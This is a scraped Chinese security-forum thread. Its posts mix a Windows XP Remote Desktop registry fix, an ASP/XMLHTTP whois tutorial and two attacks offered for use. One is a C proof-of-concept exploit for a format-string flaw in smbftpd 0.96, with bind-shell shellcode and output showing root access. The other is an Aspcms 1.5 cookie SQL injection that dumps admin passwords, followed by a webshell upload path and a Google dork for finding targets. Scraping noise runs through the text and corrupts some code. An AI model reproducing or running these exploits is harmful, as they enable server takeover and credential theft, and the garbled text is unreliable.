返回列表 发帖

解决方法:远程计算机需要网络级别身份验证,而您的计算机不支持该验证

故障症状:当您使用Windows XP“远程桌面连接”工具去连接Windows Vistas或Windows Server 2008的远程桌面、终端服务时,出现上述故障。6 a& J% S$ h6 V9 N& g+ U
故障产生环境:远程桌面连接工具6.0以下版本,或者Windows XP Profressional SP1、SP2、SP3
  Q- p% Z: i! m: H: U" R解决方法:8 I6 H, d0 k- `
1、请升级“远程桌面连接”工具最新6.1版本。% P4 S1 `" j1 K( Q; R  ~" I) ^. `
2、请把XP升级到最新SP3补丁包。
+ J; L5 ?. E; b. O3、运行“regedit”打开注册表编辑器,进入 “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa”,双击右边栏中的 “Security Packages”,打开“编辑多字符串”对话框,在列表框光标处增加“tspkg”字符。  
' w2 m; j' h4 \4、然后定位到 “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders”,双击右侧的“SecurityProviders”字符串,打开“编辑字符串”对话框,在数值末端中添加“, credssp.dll”,注意逗号后有一个英文的空格。  4 K# h, E( L5 z) S; s  U
5、退出注册表程序,重启计算机后故障排除。- }0 ~! p4 P( p" J
重启系统后,然后再运行mstsc查看关于信息已经显示为支持网络级别身份验证了。
! D+ p9 z" w( E+ ^! S$ X- c' Y$ u/ T/ P2 Z: [' Q
    有些文章写win2008/Vista不能用IP访问远程桌面,只能用机器名,是不对的。都是可以的。0 w0 f8 ?( m5 Q5 G8 O1 A+ N
$ M/ x1 s/ Z/ I; S' P* y4 T
知识点:什么是网络级身份验证?9 K5 O0 d1 V' O/ P
    网络级身份验证 (NLA) 是一种新的身份验证方法,在您建立所有远程桌面连接之前完成用户身份验证,. e8 s6 u$ ^4 N( F4 y
并出现登录屏幕。 这是最安全的身份验证方法,有助于保护远程计算机避免黑客或恶意软件的攻击。NLA
1 D% \3 }2 e1 v0 {( V7 J( e) Z的优点是:5 D$ F- C4 ~" `1 ~$ P& x7 a
    最初需要较少的远程计算机资源。验证用户之前,远程计算机使用有限的资源,而不是像以前版本那样# w$ f' S' X( G% V0 u. O8 f5 h1 `
启动所有远程桌面连接。7 l1 G. U, O- b; a- r
    它通过降低拒绝服务攻击的风险帮助提供更好的安全性。(拒绝服务攻击试图限制或阻止访问Internet。)
: u4 D8 _/ Q. Z$ V    使用远程计算机身份验证,从而帮助防止用户连接到设置为恶意目的的远程计算机

 

您可能还想看的主题:

新手来论坛学习

美国发明了网络数字大炮,可摧毁整个互联网

花旗支付注入漏洞

计算机犯罪司法解释出台:提供程序工具属犯罪

黑客基地VIP教程1-104课下载<本人求个师傅!要免费的!》

免费数据恢复软件(OO DiskRecovery)下载v7.1.183汉化版

SQL注入是什么情况?

学什么都好,不要学人当黑客

Apache服务器安全防范

如何攻站

1

评分人数

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:haimimi008发表,本帖发表者haimimi008符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者haimimi008和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

smbftpd 0.96 远程格式化字符串 Exploit
/** smbftpd 0.96 Proof of concept* tested with smbftpd 0.96 compiled with gcc 3.3.6** 1. write jumpcode to `BSS`*      mov dx, 0x1234*      pop eax*      cmp ax, dx*      jne $-4*      jmp esp* 2. overwrite a GOT entry with the addr to `BSS` &amp; send shellcode**  jerry:~> ./bleh -h localhost*  [+] GOT: 0x80591d8 - .bss (jmpcode): 0x805a791*  [+] localhost:21 (user: anonymous pass: )*  [+] PASV*  [+] writing jumpcode*  [+] PASV*  [+] overwriting GOT entry and sending shellcode*  jerry:~> nc localhost 4444*  id*  uid=0(root) gid=0(root) euid=1002(ftp) egid=1002(ftp) groups=1002(ftp)***  - Jerry Illikainen <jerry@debork.se>**/#include <stdio.h>#include <string.h>#include <sys/types.h>#include <sys/socket.h>#include <netinet/in.h>#include <netdb.h>#include <stdarg.h>#include <unistd.h>#include <stdlib.h>#define GOT 0x080591d8 // GOT entry for chdir#define BSS 0x0805a791 // this is where the jumpcode will be written#define DEBUG(d) if (debug) d;#define MAXPATH 255#define BUFSIZE 512unsigned int debug = 0;/* bindshell (port 4444) from metasploit.com* restricted chars = 0x00 0x0a 0x0d */unsigned char shellcode[] ="x31xc9x83xe9xebxd9xeexd9x74x24xf4x5bx81x73x13xa3""xefxd7xdbx83xebxfcxe2xf4x92x34x84x98xf0x85xd5xb1""xc5xb7x4ex52x42x22x57x4dxe0xbdxb1xb3xb2xb3xb1x88""x2ax0exbdxbdxfbxbfx86x8dx2ax0ex1ax5bx13x89x06x38""x6ex6fx85x89xf5xacx5ex3ax13x89x1ax5bx30x85xd5x82""x13xd0x1ax5bxeax96x2ex6bxa8xbdxbfxf4x8cx9cxbfxb3""x8cx8dxbexb5x2ax0cx85x88x2ax0ex1ax5b";void usage (char *arg){printf("%s [options]$ c% s7 G: c- q0 X
"   "         -h <host>" b. B7 |  {( E5 m: [
"   "         -p <port>
6 v+ \, k$ H1 N9 h$ L"   "         -u <usernmae - default anonymous>
6 S- o* e/ A# b"   "         -P <password - default none>3 j1 b) ~$ X. ]$ \, H6 p
8 p" Y) q6 A5 J6 w, H- ^9 K1 m2 M
", arg);exit(1);}int sock (int port, char *host){struct hostent *h;struct sockaddr_in addr;int s;if ((h = gethostbyname(host)) == NULL){perror("[!] gethostbyname");exit(1);}if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){perror("[!] socket");exit(1);}addr.sin_family = AF_INET;addr.sin_port = htons(port);addr.sin_addr = *((struct in_addr *)h->h_addr);memset(addr.sin_zero, '', sizeof addr.sin_zero);if (connect(s, (struct sockaddr *)&amp;addr, sizeof(struct sockaddr)) == -1){perror("[!] connect");exit(1);}return s;}char *s_send (int s, char *m, char *fmt, ...){static char buf[BUFSIZE];char str[BUFSIZE];ssize_t nb;va_list ap;va_start(ap, fmt);vsnprintf(str, BUFSIZE-1, fmt, ap);va_end(ap);if (send(s, str, strlen(str), 0) == -1){perror("[!] send");exit(1);}DEBUG(printf("send: %s
4 o# V! N0 E: O7 }5 R# k", str));for (;;){nb = recv(s, buf, BUFSIZE-1, 0);buf[nb-1] = '';if (m == NULL)return buf;else if (strstr(buf, m) != NULL)return buf;}}void fmt (int *jmpaddr, int *jmpc, int got, char mkd[][MAXPATH]){unsigned char a[4], b[4];char *dir = mkd[0];unsigned int i, offset = 1052, start = 256, base = 4;int *pa = (int *)jmpaddr[0], *pb = (int *)jmpc[0];for (i = 0; i <= 4; i++){a[0] = (int)pa >> 24;a[1] = ((int)pa &amp; 0xff0000) >> 16;a[2] = ((int)pa &amp; 0xff00) >> 8;a[3] = (int)pa &amp; 0xff;b[0] = (int)pb >> 24;b[1] = ((int)pb &amp; 0xff0000) >> 16;b[2] = ((int)pb &amp; 0xff00) >> 8;b[3] = (int)pb &amp; 0xff;snprintf(dir, MAXPATH-1,"%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c""%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n",a[3], a[2], a[1], a[0],a[3] + 1, a[2], a[1], a[0],a[3] + 2, a[2], a[1], a[0],a[3] + 3, a[2], a[1], a[0],b[3] - 12 + start - (base + 4 - (base%4)), offset,b[2] - b[3] + start, offset + 1,b[1] - b[2] + start, offset + 2,b[0] - b[1] + start, offset + 3);dir = mkd;if (i < 3){pa = (int *)jmpaddr;pb = (int *)jmpc;} else {pa = (int *)got;pb = (int *)jmpaddr[0];}}}int main (int argc, char **argv){int s[2], c, port = 21, pasv[5];unsigned int i;char *host = NULL, *user = "anonymous", *pass = "", *tmp, *p;char mkd[5][MAXPATH], sc[2048];int got = GOT,jmpaddr[] = { BSS, BSS+4, BSS+8 },jmpc[] = {0x1234ba66, // mov dx, 0x1234   - 66 ba 34 120xc2396658, // pop eax          - 580xe4fffa75  // cmp ax,dx        - 66 39 c2                        // jne $-4          - 75 fa                        // jmp esp          - ff e4};while ((c = getopt(argc, argv, "h:p:u:P:?")) != -1){switch (c){case 'h':host = optarg;break;case 'p':port = atoi(optarg);break;case 'u':user = optarg;break;case 'P':pass = optarg;break;case '?':default:usage(argv[0]);break;}}if (host == NULL)usage(argv[0]);printf("[+] GOT: %p - .bss (jmpcode): %p
' R8 s7 A2 X6 U: R", (void *)got, (void *)jmpaddr[0]);fmt(jmpaddr, jmpc, got, mkd);printf("[+] %s:%d (user: %s pass: %s)
% A& ~: u6 F3 [; {! n", host, port, user, pass);s[0] = sock(port, host);s_send(s[0], "331", "USER %s9 X6 B  N2 l1 r4 y+ V5 i- D
", user);p = s_send(s[0], NULL, "PASS %s
4 b3 G* |/ u5 [3 Z$ O0 a", pass);if (strstr(p, "230") == NULL){printf("[!] login failed
" a: e3 u( l  s");exit(1);}p = s_send(s[0], NULL, "MKD %s
$ J0 ]# {2 A& h& mMKD %s
$ ?+ x2 X4 c- A) v9 n" X6 pMKD %s! D& b- {8 ]( {  N
", mkd[0], mkd[1], mkd[2]);if (strstr(p, "257") == NULL){printf("[!] couldn't make directories
9 Y/ c+ g% b1 x) t+ Z, {" |");exit(1);}printf("[+] PASV
7 ~, v* ~2 V' X6 g; `");p = s_send(s[0], "227", "PASV" M( w0 f1 s+ A+ M$ C2 t1 ]7 z
");if (strtok(p, ",") == NULL)exit(1);for (i = 0; i < 5; i++){if ((tmp = strtok(NULL, ",")) == NULL){printf("[!] aborting1 U# c$ h/ U- O' H. {5 n; V
");exit(1);}pasv = atoi(tmp);}s[1] = sock(pasv[3]*256+pasv[4], host);printf("[+] writing jumpcode1 u. |/ t! f! L. Q! h1 u
");s_send(s[0], NULL, "NLST -R/ U1 {( \8 F5 C/ L3 f+ H; d2 r
");s_send(s[0], NULL, "RMD %s6 b* d# w  E0 W4 B* ~
RMD %s
6 l0 `" [1 c# w- G# o7 IRMD %s, ~' x7 l' ^$ V2 }: I; k" E/ I. T
", mkd[0], mkd[1], mkd[2]);close(s[1]);s_send(s[0], NULL, "MKD %s+ Q* S( g( Q9 R7 u
", mkd[3]);printf("[+] PASV
' Y! Y! ^. U% A( I" T$ i/ N");p = s_send(s[0], "227", "PASV# ~7 F/ ^5 z$ T! `
");if (strtok(p, ",") == NULL)exit(1);for (i = 0; i < 5; i++){if ((tmp = strtok(NULL, ",")) == NULL){printf("[!] aborting
% N6 }- t9 t6 i");exit(1);}pasv = atoi(tmp);}s[1] = sock(pasv[3]*256+pasv[4], host);memset(sc, 0x90, sizeof(sc)); // some nops before andmemcpy(sc+3, "x34x12", 2); // after the "mark"memcpy(sc+12, shellcode, sizeof(sc)-12);printf("[+] overwriting GOT entry and sending shellcode5 F8 P# d. `* v, Z8 F
' R. H2 @" g( C( B: T6 G
");s_send(s[0], NULL, "NLST -R%s
4 y% `; t6 K$ w8 f9 w", sc);return 0;}
# S  g7 O$ H9 B. O3 c# w
: D3 [9 F9 Z+ t% E6 R( O: ~
# P* v0 v; b! |( @/ u+ s
1 A- [/ K, S) P0 C9 n1 h5 w# G; F; i1 X  Y

! r2 p! W* M) \- l$ `' k! ~, R# z. B/ B8 N- d# S# L5 ^
  H+ {! F- s) J: ^$ F
0 c4 N0 z8 N. ?+ V- N3 R+ j5 r, E$ U
/ R* N+ q& J- @- @6 y1 W4 v

8 W. o7 g/ g; ?5 J' H6 A! B! b' Y, e- Y5 P9 b

8 ?- f2 V" N: O7 k5 ^1 O3 F  ?. Q0 U3 \. v1 k) {

% s, d7 |& k* z% W6 x
* E: m) b- v) g) q) v, M+ `
9 c7 b, y! U1 @! b* a. ]4 k8 O/ X  o' s' b1 ]

  L% p; l: w% l公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

使用xmlhttp为网站增加域名查询功能
当我们准备建立一个Web站点时,就必须向域名登记机构申请一个Internet域名,因此,我们通常希望了解自己准备使用的域名是否已经被注册,这时,可以访问NIC站点http://www.nic.net,点击"whois"链接后输入需查询的域名,就可以得到我们需要的结果。

4 x( `* t& \2 ~: j- D/ K

) n$ J% x/ F1 u4 Y6 P" |
WHOIS服务器为 .com、.net 和 .org 的国际顶级域名的查询返回全部的 whois 数据,包括网站域名注册人、管理合约、联系方式(电话、电子邮件、地址)、帐单联络、技术支持和域名服务器信息,对于用户了解一个网站的基本情况很有帮助。在很多域名注册服务商的网站中,通常都有whois(域名查询)的高级服务,但个人网站因为不具备域名注册服务商的资格和数据,所以在一般条件下无法提供whois服务。 Chinaz.com

* ?8 {7 [6 c. p; `7 f6 R
其实,利用XMLHTTP协议,我们每个人都可以在自己的个人网站中提供域名详细情况查询(WHOIS)服务,本文介绍了如何使用ASP结合xmlhttp编程来实现这个功能。  
* k  ^. \. Z0 M9 G' m2 K# G% ^
一、原理:  
* V- N6 G; K; n% `7 @  S8 g0 v
原理非常简单,域名的查询主要是基于RFC 954提供的WHOIS协议。在实现过程中,我们通过自己的WEB服务器访问NIC站点的WHOIS数据库服务器,从WHOIS数据库中查询我们所需要的内容,然后通过ASP组合成网页回送给客户端。  

/ Z( B) s! b: U! r1 Y
同时,我们使用xmlHttp协议实现客户端网页无刷新效果以及向服务端提出检索WHOIS数据的要求。  

& }8 Z* Z$ O9 }$ v% O3 F; _  G5 ]2 x
具体流程为:客户端通过xmlhttp提出域名查询要求-->WEB服务器中的ASP侦听页接受请求后使用xmlhttp向WHOIS服务器发送检索命令-->WHOIS数据库执行查询操作,返回结果给我们自己的WEB服务器(html形式)-->WEB服务器接收到内容后,立即将结果传送给客户端->客户端浏览器使用vbscript过滤掉HTML多余部分,挑选出whois数据显示出来。
6 l2 O$ _- Q0 Q% M( w; G
' P, }6 f& `4 n/ }4 d
二、ASP XmlHttp编程简述:  

. G6 M7 h2 |2 T7 D9 G( \4 A$ C
1、客户端html页面:
  C) P* ~. P9 D( t
* |  @" g6 G0 n1 K$ t0 D
以下为引用的内容:<script language="vbscript"> Sub submit1_onmouseup '当点击“查询”按钮时触发;  Dim objXML, objXSL, objFSO,strFile, strFileName, strXSL,strURL,TheForm  Set TheForm = Document.wordfind  window.status="正在检索数据···"  strURL="dns.asp"  Set objXML = CreateObject("Microsoft.XMLHTTP") '创建MS的XMLHTTP组件;  stra = "submit=submit&amp;fqdn="&amp;TheForm.words.value  objXML.Open "post",strURL,false '采用Post提交方式;  objXML.setrequestheader "content-length",len(stra) Www~Chinaz~com

8 @  P9 ?6 H, b. L4 b2 s$ g) Z/ r
  objXML.setrequestheader "content-type","application/x-www-form-urlencoded"  objXML.send stra ' 发送信息  xmlGet = objXML.responseText '稍等片刻后,得到服务器端传回来的结果;  if instr(1,xmlGet,"This is not a valid .com .net .org .info or .biz domain  name",1)<1 and len(trim(xmlGet))>100 then    if instr(1,xmlGet,"This domain is available",1)<1 then     if instr(1,xmlGet,"Registrant:",1) then      strFind1 =instr(1,xmlGet,"Registrant:",1)    else      strFind1 = instr(1,xmlGet,"<pre><FONT face=""Verdana, Arial",1)+65

8 W7 ^: c8 T/ a& g& g
strFind2 = instr(1,xmlGet,"</FONT></pre>",1)     strFind4=strFind2-strFind1     sHTML = mid(xmlGet,strFind1,strFind4)     TheForm.comments.value="查询结果:"+chr(13)+chr(10)+sHTML     window.status="查询结果:该域名已被占用"   else    TheForm.comments.value="恭喜你,此域名可用!" Www^     window.status="查询结果:该域名仍然处于可用状态!"    end if  else   TheForm.comments.value= "无效的国际顶级域名!请输入以(.com .net .org .info or .biz)结尾的国际域名, 例如sun.com"   window.status="无效的国际顶级域名!请输入以(.com .net .org .info or .biz)结尾的国际域名, 例如CCTV.com"  end if  Set objXML = Nothing end sub </script>
; v1 q5 X; v2 T2 a2 j7 g9 }. r5 I8 Y
<html><head><title>XMLHTTP之域名查询篇</title></head><body bgColor=#cccca3><form method="post" name=wordfind onsubmit="javascript:return false">请输入域名名称:<input type="text" value="cctv.com" name="words" size="69"><input type="submit" value="查询" id=Submit1 name=Submit1><TEXTAREA name=comments readonly rows=10 cols=76></TEXTAREA></form></body></html>  
8 `# r; U3 f; V3 y  q
2、服务器端ASP程序: Chinaz.com
+ n' [% ?5 |( ?" g
以下为引用的内容:<%dim xmlGet,objXML, objXSL, objFSO,strFile, strFileName, strXSL,strURL xmlGet="" if len(trim(Request.form("fqdn"))) > 1 then  strURL="http://www.domainbank.net/whoisresults_gen.cfm?show=1"   'WhoIS服务器的地址  Set objXML = CreateObject("Microsoft.XMLHTTP") '创建MS的XMLHTTP组件

2 o/ x7 Z; K) ?0 I% |, z
  stra = "submit=submit&amp;fqdn="&amp;trim(Request.form("fqdn"))  objXML.Open "post",strURL,false  objXML.setrequestheader "content-length",len(stra)  objXML.setrequestheader "content-type","application/x-www-form-urlencoded" Chinaz   objXML.send stra ' 发送信息到WhoIs数据库服务器;
3 h( u3 d! d+ l1 n$ X/ \# k' o. v
  xmlGet = objXML.responseText ' 取得域名服务器返回的信息  Set objXML = Nothing end if response.write xmlGet '返回结果给客户端%>  
' z# b2 m* R* _  ^$ D# P7 X
在上述过程中,可以发现我们自己的WEB服务器中的ASP程序其实只起到一个中间传递的作用,在实际应用中,也可以省去这个中间层,使用vbscript通过xmlhttp直接向WHOIS数据库发送和接收数据。不过这样的话,可能会因为IE中“通过(其它)域访问数据资源”被禁用(默认)而引起权限不够导致无法执行,所以该省去ASP中间层的方法并不太通用。

9 e$ M# r) ?8 n  k
) N! N% L. S4 Q. L+ `" I1 ?+ S
本程序在基于Windows2000平台的IIS5.0和IE6.0上运行通过。实际使用过程中,可以把上述代码拷贝到自己网页中,经过简单的页面编辑,就可在自己的网页中增加在页面无刷新情况下的域名查询功能了,初看上去,还真的有点象专业的域名注册服务商网站提供的服务了。
5 X: l0 p* v' O8 _: Y& K4 |" X

% j# l; }3 x8 ~
- O+ Q; Y; s8 f& `. G
: P% x. P  U& {3 O( |6 G* ?/ O
4 |0 h- L4 X3 x% a! D6 D
4 [# }$ f& r& T; E: B
) H4 h) b. i6 ]7 R/ Q2 q6 i. M2 l% ?8 G& M/ {
4 M1 p, a3 o$ |9 @) x
8 P- G; Q4 J1 P

1 J) D/ b% q4 x& M
* B3 X6 }1 m2 D. j$ ~% N
1 Z6 _4 `0 ~- A9 W( W- C- x
) P( X3 [0 ]' o" _/ F) G- J* B/ g. \) J$ B- p; i
$ ]# T' v+ V# Y: h
9 `: U% \/ g6 G- s$ c

2 b2 t) S: Y) T# W3 k
7 e5 r! M/ l9 _, j6 \' F* j9 w; i! O# w
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Aspcms 稳定版1.5 0day
Author: Virushack
' r% s  e  M/ e* B: `
Blog: http://virushack.org

3 F- _% d" n. F8 [7 a, A
From:www.v5script.org

( L7 o# }$ n5 Y) B# b7 Q' R8 ^
漏洞文件:editpass.asp

  M6 f" n2 w2 @% R& ?
漏洞代码:

9 g, c2 g* ], s2 v$ a( X2 P
Dim   linkman  ,  gender  ,  phone  ,  mobile  ,  email  ,  qq  ,  address  , postcode
- U/ @5 {/ N  [if   isnul  (  rCookie  (  "loginstatus"   ))   then   wCookie  "loginstatus"   ,  0 8 {9 o" ~/ t$ T( Y8 x
if   rCookie  (  "loginstatus"   )=  1     then  
9 s0 v, I- D  _1 {1 m  j& m$ Mset   rsObj  =  conn  .  Exec   (  "select * from aspcms_Users where UserID=" &amp; trim  (  rCookie  (  "userID"  )),  "r1" )  
) x$ `. S, Z8 Q直接通过rCookie 取得userid带入查询. 4 m; p/ Y% }8 W$ n; v5 P$ a% i
再看看 rcookie函数的处理

9 J0 q! @+ N* S% w
'读cookies
" K" {1 F* k1 r: W# h& v6 M. yFunction rCookie(cookieName) & p7 r3 [9 D! @( M  [8 u
rCookie=request.cookies(cookieName) 7 @$ h7 \6 U* {, G6 k
End Function 3 L+ L# m& B4 _6 J8 O1 h4 U/ ?4 y! N
直接通过cookies取得
7 j! d! d' E# X  o, X# A% C
利用:
: `; ]$ y, z4 w& r7 Y! `1.注册个帐号让 loginstatus不为空 1 C  X1 x' z' ^
2.cookies注入 userID(不管你手注还是工具都行 推荐用火狐的cookies插件)
, w& N7 `: }9 I  u* J6 \$ a0 I
Exploit:UNION SELECT 1,2,3,4,5,6,username,adminpassword,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from Aspcms_admins
# s8 s0 }* E- q; v
后台拿shell 就更简单了  插一句话什么都行  我这就用最稳当的方法
. m' F6 {) k, `
http://127.0.0.1/admin/_Style/AspCms_TemplateEdit.asp?filename=a.asp
6 M( c" Y6 F5 ?" i
http://127.0.0.1/Templates/default/html/a.asp
& G4 Q$ X2 N& a) ^: t1 d
Google Dork: Powered by AspCms v1.5
, w) @( w2 ]6 \0 z- z

7 f% E8 h0 _% r7 B# W* A: ^- i) Q% V

+ K) Z& P; X: j5 L7 M! p4 [& P- k1 R9 C6 X( p2 @. ?- K- h- g$ o

" t' Y% b. g% i
: B9 x$ L3 w$ ~) J* t
; R6 W; V9 h( r+ [5 N' O% S
. p" u/ R- W+ K9 i: \
6 E2 @* y  }# h# _1 A( e+ u' m7 p' [0 K9 f; L0 G

8 x) F" p9 z" V+ \) k# u
: E# {* O( l4 h- i7 W$ ]; {3 `8 P6 c4 \- m  L4 ^& `8 K+ N( t
$ o& P8 i% e  v
  `( b8 _, s7 H
' ?) Z( k9 @  @* s( u5 z" q( I

/ p9 y& Z8 [0 w5 b8 |: b
0 m+ n; h/ ?# s& R* f公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表